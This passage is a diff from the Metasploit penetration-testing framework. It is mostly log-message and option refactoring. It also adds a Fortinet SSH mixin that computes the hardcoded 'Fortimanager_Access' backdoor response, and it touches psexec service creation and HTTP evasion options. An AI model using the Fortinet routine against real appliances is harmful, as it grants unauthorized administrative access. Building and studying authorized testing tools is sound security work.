query.includes(:targets) + query = query.includes(:targets).references(:targets) union_conditions << Mdm::Module::Target.arel_table[:name].matches_any(formatted_values) when 'text' formatted_values = match_values(value_set) @@ -240,22 +240,22 @@ module Msf::DBManager::ModuleCache union_conditions << module_details[:fullname].matches_any(formatted_values) union_conditions << module_details[:name].matches_any(formatted_values) - query = query.includes(:actions) + query = query.includes(:actions).references(:actions) union_conditions << Mdm::Module::Action.arel_table[:name].matches_any(formatted_values) - query = query.includes(:archs) + query = query.includes(:archs).references(:archs) union_conditions << Mdm::Module::Arch.arel_table[:name].matches_any(formatted_values) - query = query.includes(:authors) + query = query.includes(:authors).references(:authors) union_conditions << Mdm::Module::Author.arel_table[:name].matches_any(formatted_values) - query = query.includes(:platforms) + query = query.includes(:platforms).references(:platforms) union_conditions << Mdm::Module::Platform.arel_table[:name].matches_any(formatted_values) - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) - query = query.includes(:targets) + query = query.includes(:targets).references(:targets) union_conditions << Mdm::Module::Target.arel_table[:name].matches_any(formatted_values) when 'type' formatted_values = match_values(value_set) @@ -275,7 +275,7 @@ module Msf::DBManager::ModuleCache when 'ref' formatted_values = match_values(value_set) - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) when 'cve', 'bid', 'osvdb', 'edb' formatted_values = value_set.collect { |value| @@ -284,7 +284,7 @@ module Msf::DBManager::ModuleCache "#{prefix}-%#{value}%" } - query = query.includes(:refs) + query = query.includes(:refs).references(:refs) union_conditions << Mdm::Module::Ref.arel_table[:name].matches_any(formatted_values) end end diff --git a/lib/msf/core/db_manager/workspace.rb b/lib/msf/core/db_manager/workspace.rb index 6bc4d3c9fe..70652b3beb 100644 --- a/lib/msf/core/db_manager/workspace.rb +++ b/lib/msf/core/db_manager/workspace.rb @@ -30,7 +30,7 @@ module Msf::DBManager::Workspace def workspaces ::ActiveRecord::Base.connection_pool.with_connection { - ::Mdm::Workspace.order('updated_at asc').all + ::Mdm::Workspace.order('updated_at asc').load } end end diff --git a/lib/msf/core/encoder.rb b/lib/msf/core/encoder.rb index 076107891e..c483d25358 100644 --- a/lib/msf/core/encoder.rb +++ b/lib/msf/core/encoder.rb @@ -537,7 +537,7 @@ protected # def find_context_key(buf, badchars, state) # Make sure our context information file is sane - if File.exists?(datastore['ContextInformationFile']) == false + if !File.exists?(datastore['ContextInformationFile']) raise NoKeyError, "A context information file must specified when using context encoding", caller end diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb index e2d2bbc5d1..e976d84e97 100644 --- a/lib/msf/core/exploit.rb +++ b/lib/msf/core/exploit.rb @@ -649,14 +649,14 @@ class Exploit < Msf::Module # Returns true if the exploit has an aggressive stance. # def aggressive? - (stance == Stance::Aggressive) + (stance == Stance::Aggressive || stance.include?(Stance::Aggressive)) end # # Returns if the exploit has a passive stance. # def passive? - (stance == Stance::Passive) + (stance == Stance::Passive || stance.include?(Stance::Passive)) end # @@ -1197,9 +1197,15 @@ class Exploit < Msf::Module # value can be one of the Handler::constants. # def handler(*args) - return if not payload_instance - return if not handler_enabled? - return payload_instance.handler(*args) + if payload_instance && handler_enabled? + payload_instance.handler(*args) + end + end + + def interrupt_handler + if payload_instance && handler_enabled? && payload_instance.respond_to?(:interrupt_wait_for_session) + payload_instance.interrupt_wait_for_session() + end end ## @@ -1351,6 +1357,9 @@ class Exploit < Msf::Module # Report the failure (and attempt) in the database self.report_failure + + # Interrupt any session waiters in the handler + self.interrupt_handler end def report_failure @@ -1506,7 +1515,7 @@ protected # required when wanting to support context keyed encoding # def define_context_encoding_reqs(reqs) - return if datastore['EnableContextEncoding'] != true + return unless datastore['EnableContextEncoding'] # At present, we don't support any automatic methods of obtaining # context information. In the future, we might support obtaining diff --git a/lib/msf/core/exploit/fortinet.rb b/lib/msf/core/exploit/fortinet.rb new file mode 100644 index 0000000000..9b8aae1f9c --- /dev/null +++ b/lib/msf/core/exploit/fortinet.rb @@ -0,0 +1,99 @@ +# -*- coding: binary -*- + +# https://www.ietf.org/rfc/rfc4256.txt + +require 'net/ssh' + +module Msf::Exploit::Remote::Fortinet + class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract + + USERAUTH_INFO_REQUEST = 60 + USERAUTH_INFO_RESPONSE = 61 + + def authenticate(service_name, username = 'Fortimanager_Access', password = nil) + debug { 'Sending SSH_MSG_USERAUTH_REQUEST' } + + send_message(userauth_request( +=begin + string user name (ISO-10646 UTF-8, as defined in [RFC-3629]) + string service name (US-ASCII) + string "keyboard-interactive" (US-ASCII) + string language tag (as defined in [RFC-3066]) + string submethods (ISO-10646 UTF-8) +=end + username, + service_name, + 'keyboard-interactive', + '', + '' + )) + + loop do + message = session.next_message + + case message.type + when USERAUTH_SUCCESS + debug { 'Received SSH_MSG_USERAUTH_SUCCESS' } + return true + when USERAUTH_FAILURE + debug { 'Received SSH_MSG_USERAUTH_FAILURE' } + return false + when USERAUTH_INFO_REQUEST + debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' } + +=begin + string name (ISO-10646 UTF-8) + string instruction (ISO-10646 UTF-8) + string language tag (as defined in [RFC-3066]) + int num-prompts + string prompt[1] (ISO-10646 UTF-8) + boolean echo[1] + ... + string prompt[num-prompts] (ISO-10646 UTF-8) + boolean echo[num-prompts] +=end + name = message.read_string + instruction = message.read_string + _ = message.read_string + + prompts = [] + + message.read_long.times do + prompt = message.read_string + echo = message.read_bool + prompts << [prompt, echo] + end + + debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' } + + send_message(Net::SSH::Buffer.from( +=begin + byte SSH_MSG_USERAUTH_INFO_RESPONSE + int num-responses + string response[1] (ISO-10646 UTF-8) + ... + string response[num-responses] (ISO-10646 UTF-8) +=end + :byte, USERAUTH_INFO_RESPONSE, + :long, 1, + :string, custom_handler(name, instruction, prompts) + )) + else + raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}" + end + end + end + + # http://seclists.org/fulldisclosure/2016/Jan/26 + def custom_handler(title, instructions, prompt_list) + n = prompt_list[0][0] + m = Digest::SHA1.new + m.update("\x00" * 12) + m.update(n + 'FGTAbc11*xy+Qqz27') + m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70") + h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest) + [h] + end + + end +end diff --git a/lib/msf/core/exploit/ftpserver.rb b/lib/msf/core/exploit/ftpserver.rb index 41dea0f789..df6b2c91ee 100644 --- a/lib/msf/core/exploit/ftpserver.rb +++ b/lib/msf/core/exploit/ftpserver.rb @@ -56,7 +56,7 @@ module Exploit::Remote::FtpServer # exists for the given command, returns a generic default response. # # @example Handle SYST requests - # class Metasploit4 < Msf::Exploit + # class MetasploitModule < Msf::Exploit # include Msf::Exploit::Remote::FtpServer # ... # def on_client_command_syst(cmd_conn, arg) @@ -237,4 +237,3 @@ module Exploit::Remote::FtpServer end end - diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4bf9ca91c4..5b57e2e408 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -50,7 +50,7 @@ module Exploit::Remote::HttpClient OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', '']), OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', '']), OptBool.new('DigestAuthIIS', [false, 'Conform to IIS, should work for most servers. Only set to false for non-IIS servers', true]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'Auto', ['Auto', 'SSL2', 'SSL3', 'TLS1']]), + Opt::SSLVersion, OptBool.new('FingerprintCheck', [ false, 'Conduct a pre-exploit fingerprint verification', true]), OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION']), OptInt.new('HttpClientTimeout', [false, 'HTTP connection and receive timeout']) @@ -85,7 +85,7 @@ module Exploit::Remote::HttpClient # # Remaining evasions to implement # -# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', 'false']), +# OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP request via "Transfer-Encoding: chunked"', false]), # OptInt.new('HTTP::junk_pipeline', [true, 'Insert the specified number of junk pipeline requests', 0]), ], self.class ) diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb index 6b58eb8a4a..7eb5370411 100644 --- a/lib/msf/core/exploit/http/server.rb +++ b/lib/msf/core/exploit/http/server.rb @@ -32,9 +32,9 @@ module Exploit::Remote::HttpServer register_evasion_options( [ - OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', 'false']), - OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', 'false']), - OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', 'false']), + OptBool.new('HTTP::chunked', [false, 'Enable chunking of HTTP responses via "Transfer-Encoding: chunked"', false]), + OptBool.new('HTTP::header_folding', [false, 'Enable folding of HTTP headers', false]), + OptBool.new('HTTP::junk_headers', [false, 'Enable insertion of random junk HTTP headers', false]), OptEnum.new('HTTP::compression', [false, 'Enable compression of HTTP responses via content encoding', 'none', ['none','gzip','deflate']]), OptString.new('HTTP::server_name', [true, 'Configures the Server header of all outgoing replies', 'Apache']) ], Exploit::Remote::HttpServer @@ -72,60 +72,13 @@ module Exploit::Remote::HttpServer Thread.current[:cli] = cli end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super + def print_prefix + if cli && (respond_to?(:aggressive) && !aggressive?) + super + "#{cli.peerhost.ljust(16)} #{self.shortname} - " + else + super + end end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_good(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def print_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_line(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_status(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_good(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_error(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # :category: print_* overrides - # Prepends client and module name if inside a thread with a #cli - def vprint_warning(msg='') - (cli) ? super("#{cli.peerhost.ljust(16)} #{self.shortname} - #{msg}") : super - end - # # Ensures that gzip can be used. If not, an exception is generated. The @@ -133,7 +86,7 @@ module Exploit::Remote::HttpServer # set. # def use_zlib - if (!Rex::Text.zlib_present? and datastore['HTTP::compression'] == true) + if !Rex::Text.zlib_present? && datastore['HTTP::compression'] raise RuntimeError, "zlib support was not detected, yet the HTTP::compression option was set. Don't do that!" end end @@ -577,16 +530,16 @@ module Exploit::Remote::HttpServer response.compress = datastore['HTTP::compression'] end - if (datastore['HTTP::chunked'] == true) + if datastore['HTTP::chunked'] response.auto_cl = false response.transfer_chunked = true end - if (datastore['HTTP::header_folding'] == true) + if datastore['HTTP::header_folding'] response.headers.fold = 1 end - if (datastore['HTTP::junk_headers'] == true) + if datastore['HTTP::junk_headers'] response.headers.junk_headers = 1 end diff --git a/lib/msf/core/exploit/http/wordpress/admin.rb b/lib/msf/core/exploit/http/wordpress/admin.rb index 7fc84f856c..a17f2b6058 100644 --- a/lib/msf/core/exploit/http/wordpress/admin.rb +++ b/lib/msf/core/exploit/http/wordpress/admin.rb @@ -10,10 +10,10 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin def wordpress_upload_plugin(name, zip, cookie) nonce = wordpress_helper_get_plugin_upload_nonce(cookie) if nonce.nil? - vprint_error("#{peer} - Failed to acquire the plugin upload nonce") + vprint_error("Failed to acquire the plugin upload nonce") return false end - vprint_status("#{peer} - Acquired a plugin upload nonce: #{nonce}") + vprint_status("Acquired a plugin upload nonce: #{nonce}") referer_uri = normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload') data = Rex::MIME::Message.new @@ -32,11 +32,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Admin ) if res && res.code == 200 - vprint_status("#{peer} - Uploaded plugin #{name}") + vprint_status("Uploaded plugin #{name}") return true else - vprint_error("#{peer} - Server responded with code #{res.code}") if res - vprint_error("#{peer} - Failed to upload plugin #{name}") + vprint_error("Server responded with code #{res.code}") if res + vprint_error("Failed to upload plugin #{name}") return false end end diff --git a/lib/msf/core/exploit/http/wordpress/base.rb b/lib/msf/core/exploit/http/wordpress/base.rb index 386b6378f9..f25298c868 100644 --- a/lib/msf/core/exploit/http/wordpress/base.rb +++ b/lib/msf/core/exploit/http/wordpress/base.rb @@ -27,7 +27,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Base return res if res && res.code == 200 && res.body && wordpress_detect_regexes.any? { |r| res.body =~ r } return nil rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e - print_error("#{peer} - Error connecting to #{target_uri}: #{e}") + print_error("Error connecting to #{target_uri}: #{e}") return nil end end diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index a9b70dae79..206b0364c7 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb @@ -52,7 +52,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) else - message = "#{peer} - Post comment failed." + message = "Post comment failed." message << " Status Code: #{res.code}" if res print_error(message) return nil @@ -67,7 +67,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [Integer,nil] The post id, nil when nothing found def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) range.each { |id| - vprint_status("#{peer} - Checking POST ID #{id}...") if (id % 100) == 0 + vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) return id if body } diff --git a/lib/msf/core/exploit/http/wordpress/posts.rb b/lib/msf/core/exploit/http/wordpress/posts.rb index 57735bdf4a..ec0f52cff6 100644 --- a/lib/msf/core/exploit/http/wordpress/posts.rb +++ b/lib/msf/core/exploit/http/wordpress/posts.rb @@ -99,11 +99,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts # @param max_redirects [Integer] maximum redirects to follow # @return [Array,nil] String Array with valid blog posts, nil on error def wordpress_get_all_blog_posts_via_feed(max_redirects = 10) - vprint_status("#{peer} - Enumerating Blog posts...") + vprint_status("Enumerating Blog posts...") blog_posts = [] begin - vprint_status("#{peer} - Locating wordpress feed...") + vprint_status("Locating wordpress feed...") res = send_request_cgi({ 'uri' => wordpress_url_rss, 'method' => 'GET' @@ -116,26 +116,26 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts path = wordpress_helper_parse_location_header(res) return nil unless path - vprint_status("#{peer} - Web server returned a #{res.code}...following to #{path}") + vprint_status("Web server returned a #{res.code}...following to #{path}") res = send_request_cgi({ 'uri' => path, 'method' => 'GET' }) if res.code == 200 - vprint_status("#{peer} - Feed located at #{path}") + vprint_status("Feed located at #{path}") else - vprint_status("#{peer} - Returned a #{res.code}...") + vprint_status("Returned a #{res.code}...") end count = count - 1 end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return nil end if res.nil? or res.code != 200 - vprint_status("#{peer} - Did not recieve HTTP response for RSS feed") + vprint_status("Did not recieve HTTP response for RSS feed") return blog_posts end @@ -143,7 +143,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts links = res.body.scan(/([^<]+)<\/link>/i) if links.nil? or links.empty? - vprint_status("#{peer} - Feed did not have any links present") + vprint_status("Feed did not have any links present") return blog_posts end diff --git a/lib/msf/core/exploit/http/wordpress/users.rb b/lib/msf/core/exploit/http/wordpress/users.rb index 4ddac519ad..98fd963bc8 100644 --- a/lib/msf/core/exploit/http/wordpress/users.rb +++ b/lib/msf/core/exploit/http/wordpress/users.rb @@ -48,7 +48,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Users end if res.nil? - print_error("#{peer} - Error getting response.") + print_error("Error getting response.") return nil elsif res.code == 200 and ( diff --git a/lib/msf/core/exploit/http/wordpress/version.rb b/lib/msf/core/exploit/http/wordpress/version.rb index 80c693e56d..3561534b49 100644 --- a/lib/msf/core/exploit/http/wordpress/version.rb +++ b/lib/msf/core/exploit/http/wordpress/version.rb @@ -134,7 +134,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version res = nil readmes.each do |readme_name| readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, readme_name) - vprint_status("#{peer} - Checking #{readme_url}") + vprint_status("Checking #{readme_url}") res = send_request_cgi( 'uri' => readme_url, 'method' => 'GET' @@ -180,7 +180,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version # Could not identify version number return Msf::Exploit::CheckCode::Detected if version.nil? - vprint_status("#{peer} - Found version #{version} of the #{item_type}") + vprint_status("Found version #{version} of the #{item_type}") if fixed_version.nil? if vuln_introduced_version.nil? diff --git a/lib/msf/core/exploit/jsobfu.rb b/lib/msf/core/exploit/jsobfu.rb index 4037df99d7..73b3ce2b47 100644 --- a/lib/msf/core/exploit/jsobfu.rb +++ b/lib/msf/core/exploit/jsobfu.rb @@ -8,7 +8,8 @@ module Msf def initialize(info={}) super register_advanced_options([ - OptInt.new('JsObfuscate', [false, "Number of times to obfuscate JavaScript", 0]) + OptInt.new('JsObfuscate', [false, "Number of times to obfuscate JavaScript", 0]), + OptString.new('JsIdentifiers', [false, "Identifiers to preserve for JsObfu"]) ], Exploit::JSObfu) end @@ -18,14 +19,20 @@ module Msf # @param js [String] JavaScript code # @param opts [Hash] obfuscation options # * :iterations [FixNum] Number of times to obfuscate + # * :preserved_identifiers [Array] An array of identifiers to preserve during obfuscation # @return [::Rex::Exploitation::JSObfu] # def js_obfuscate(js, opts={}) iterations = (opts[:iterations] || datastore['JsObfuscate']).to_i + identifiers = opts[:preserved_identifiers].blank? ? (datastore['JsIdentifiers'] || '').split(',') : opts[:preserved_identifiers] obfu = ::Rex::Exploitation::JSObfu.new(js) - obfu.obfuscate(:iterations=>iterations) + obfu_opts = {} + obfu_opts.merge!(iterations: iterations) + obfu_opts.merge!(preserved_identifiers: identifiers) + + obfu.obfuscate(obfu_opts) obfu end end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index ac7c718b7d..21808beede 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -116,3 +116,6 @@ require 'msf/core/exploit/http/jboss' # Kerberos Support require 'msf/core/exploit/kerberos/client' + +# Fortinet +require 'msf/core/exploit/fortinet' diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 09f3f9487e..b6fc8d0706 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb @@ -32,7 +32,7 @@ module Exploit::Remote::Postgres Opt::RPORT(5432), OptString.new('DATABASE', [ true, 'The database to authenticate against', 'template1']), OptString.new('USERNAME', [ true, 'The username to authenticate as', 'postgres']), - OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', '']), + OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', 'postgres']), OptBool.new('VERBOSE', [false, 'Enable verbose output', false]), OptString.new('SQL', [ false, 'The SQL query to execute', 'select version()']), OptBool.new('RETURN_ROWSET', [false, "Set to true to see query result sets", true]) @@ -292,6 +292,8 @@ module Exploit::Remote::Postgres when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user + when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database + when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host # Windows diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index 1ad7cffa70..466f03281c 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -7,6 +7,7 @@ require 'set' require 'rex/exploitation/js' require 'msf/core/exploit/jsobfu' require 'msf/core/exploit/remote/browser_profile_manager' +require 'msf/core/module' ### # @@ -28,6 +29,8 @@ module Msf include Msf::Exploit::RopDb include Msf::Exploit::JSObfu include Msf::Exploit::Remote::BrowserProfileManager + include Msf::Module::UI::Line::Verbose + include Msf::Module::UI::Message::Verbose # this must be static between runs, otherwise the older cookies will be ignored DEFAULT_COOKIE_NAME = '__ua' @@ -136,7 +139,6 @@ module Msf clear_browser_profiles unless self.datastore['BrowserProfilePrefix'] end - # Returns the custom 404 URL set by the user # # @return [String] @@ -586,7 +588,7 @@ module Msf if profile.nil? print_status("Browsing directly to the exploit URL is forbidden.") send_not_found(cli) - elsif profile[:tried] and datastore['Retries'] == false + elsif profile[:tried] && !datastore['Retries'] print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.") send_not_found(cli) else diff --git a/lib/msf/core/exploit/smb/client.rb b/lib/msf/core/exploit/smb/client.rb index b104b9e48a..df006885f7 100644 --- a/lib/msf/core/exploit/smb/client.rb +++ b/lib/msf/core/exploit/smb/client.rb @@ -64,7 +64,7 @@ module Msf register_options( [ Opt::RHOST, - OptInt.new('RPORT', [ true, 'Set the SMB service port', 445]) + OptPort.new('RPORT', [ true, 'The SMB service port', 445]) ], Msf::Exploit::Remote::SMB::Client) register_autofilter_ports([ 139, 445]) diff --git a/lib/msf/core/exploit/smb/client/psexec.rb b/lib/msf/core/exploit/smb/client/psexec.rb index bd60e6c675..cb1acf684b 100644 --- a/lib/msf/core/exploit/smb/client/psexec.rb +++ b/lib/msf/core/exploit/smb/client/psexec.rb @@ -74,7 +74,7 @@ module Exploit::Remote::SMB::Client::Psexec simple.disconnect("\\\\#{host}\\#{smbshare}") return contents rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") + print_error("Unable to read file #{file}. #{e.class}: #{e}.") return nil end end @@ -94,16 +94,16 @@ module Exploit::Remote::SMB::Client::Psexec def psexec(command, disconnect=true) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") + vprint_status("Binding to #{handle} ...") dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") + vprint_status("Bound to #{handle} ...") + vprint_status("Obtaining a service manager handle...") svc_client = Rex::Proto::DCERPC::SVCCTL::Client.new(dcerpc) scm_handle, scm_status = svc_client.openscmanagerw(datastore['RHOST']) if scm_status == ERROR_ACCESS_DENIED - print_error("#{peer} - ERROR_ACCESS_DENIED opening the Service Manager") + print_error("ERROR_ACCESS_DENIED opening the Service Manager") end return false unless scm_handle @@ -114,68 +114,68 @@ module Exploit::Remote::SMB::Client::Psexec opts = {} end - vprint_status("#{peer} - Creating the service...") + vprint_status("Creating the service...") svc_handle, svc_status = svc_client.createservicew(scm_handle, service_name, display_name, command, opts) case svc_status when ERROR_SUCCESS - vprint_good("#{peer} - Successfully created the service") + vprint_good("Successfully created the service") when ERROR_SERVICE_EXISTS service_exists = true - print_warning("#{peer} - Service already exists, opening a handle...") + print_warning("Service already exists, opening a handle...") svc_handle = svc_client.openservicew(scm_handle, service_name) when ERROR_ACCESS_DENIED - print_error("#{peer} - Unable to create service, ACCESS_DENIED, did AV gobble your binary?") + print_error("Unable to create service, ACCESS_DENIED, did AV gobble your binary?") return false else - print_error("#{peer} - Failed to create service, ERROR_CODE: #{svc_status}") + print_error("Failed to create service, ERROR_CODE: #{svc_status}") return false end if svc_handle.nil? - print_error("#{peer} - No service handle retrieved") + print_error("No service handle retrieved") return false else if service_description - vprint_status("#{peer} - Changing service description...") + vprint_status("Changing service description...") svc_client.changeservicedescription(svc_handle, service_description) end - vprint_status("#{peer} - Starting the service...") + vprint_status("Starting the service...") begin svc_status = svc_client.startservice(svc_handle) case svc_status when ERROR_SUCCESS - print_good("#{peer} - Service started successfully...") + print_good("Service started successfully...") when ERROR_FILE_NOT_FOUND - print_error("#{peer} - Service failed to start - FILE_NOT_FOUND") + print_error("Service failed to start - FILE_NOT_FOUND") when ERROR_ACCESS_DENIED - print_error("#{peer} - Service failed to start - ACCESS_DENIED") + print_error("Service failed to start - ACCESS_DENIED") when ERROR_SERVICE_REQUEST_TIMEOUT - print_good("#{peer} - Service start timed out, OK if running a command or non-service executable...") + print_good("Service start timed out, OK if running a command or non-service executable...") else - print_error("#{peer} - Service failed to start, ERROR_CODE: #{svc_status}") + print_error("Service failed to start, ERROR_CODE: #{svc_status}") end ensure begin # If service already exists don't delete it! # Maybe we could have a force cleanup option..? if service_exists - print_warning("#{peer} - Not removing service as it already existed...") + print_warning("Not removing service as it already existed...") elsif datastore['SERVICE_PERSIST'] - print_warning("#{peer} - Not removing service for persistance...") + print_warning("Not removing service for persistance...") else - vprint_status("#{peer} - Removing the service...") + vprint_status("Removing the service...") svc_status = svc_client.deleteservice(svc_handle) if svc_status == ERROR_SUCCESS - vprint_good("#{peer} - Successfully removed the sevice") + vprint_good("Successfully removed the sevice") else - print_error("#{peer} - Unable to remove the service, ERROR_CODE: #{svc_status}") + print_error("Unable to remove the service, ERROR_CODE: #{svc_status}") end end ensure - vprint_status("#{peer} - Closing service handle...") + vprint_status("Closing service handle...") svc_client.closehandle(svc_handle) end end @@ -189,10 +189,6 @@ module Exploit::Remote::SMB::Client::Psexec true end - def peer - "#{rhost}:#{rport}" - end - end end diff --git a/lib/msf/core/exploit/smb/server/share.rb b/lib/msf/core/exploit/smb/server/share.rb index 1ddbdd4172..df5f43aca6 100644 --- a/lib/msf/core/exploit/smb/server/share.rb +++ b/lib/msf/core/exploit/smb/server/share.rb @@ -17,7 +17,7 @@ module Msf # @example Use it from an Auxiliary module # require 'msf/core' # - # class Metasploit3 < Msf::Auxiliary + # class MetasploitModule < Msf::Auxiliary # # include Msf::Exploit::Remote::SMB::Server::Share # @@ -59,7 +59,7 @@ module Msf # @example Use it from an Exploit module # require 'msf/core' # - # class Metasploit3 < Msf::Exploit::Remote + # class MetasploitModule < Msf::Exploit::Remote # Rank = ExcellentRanking # # include Msf::Exploit::EXE diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index a4900e8b1c..9ff8693723 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb @@ -71,7 +71,7 @@ module Exploit::Remote::SMTPDeliver # This method currently only knows about PLAIN authentication. # def connect_login(global = true) - print_verbose("Connecting to SMTP server #{rhost}:#{rport}...") + vprint_status("Connecting to SMTP server #{rhost}:#{rport}...") nsock = connect(global) if datastore['DOMAIN'] and not datastore['DOMAIN'] == '' @@ -114,7 +114,7 @@ module Exploit::Remote::SMTPDeliver else if datastore['PASSWORD'] and datastore["USERNAME"] and not datastore["USERNAME"].empty? # Let the user know their creds are going unused - print_verbose("Server didn't ask for authentication, skipping") + vprint_status("Server didn't ask for authentication, skipping") end end end @@ -170,7 +170,7 @@ module Exploit::Remote::SMTPDeliver end if not already_connected - print_verbose("Closing the connection...") + vprint_status("Closing the connection...") disconnect(nsock) end @@ -187,11 +187,11 @@ module Exploit::Remote::SMTPDeliver return false if not nsock if cmd =~ /AUTH PLAIN/ # Don't print the user's plaintext password - print_verbose("C: AUTH PLAIN ...") + vprint_status("C: AUTH PLAIN ...") else # Truncate because this will include a full email and we don't want # to dump it all. - print_verbose("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") + vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end nsock.put(cmd) @@ -199,17 +199,11 @@ module Exploit::Remote::SMTPDeliver # Don't truncate the server output because it might be helpful for # debugging. - print_verbose("S: #{res.strip}") if res + vprint_status("S: #{res.strip}") if res return res end - def print_verbose(msg) - if 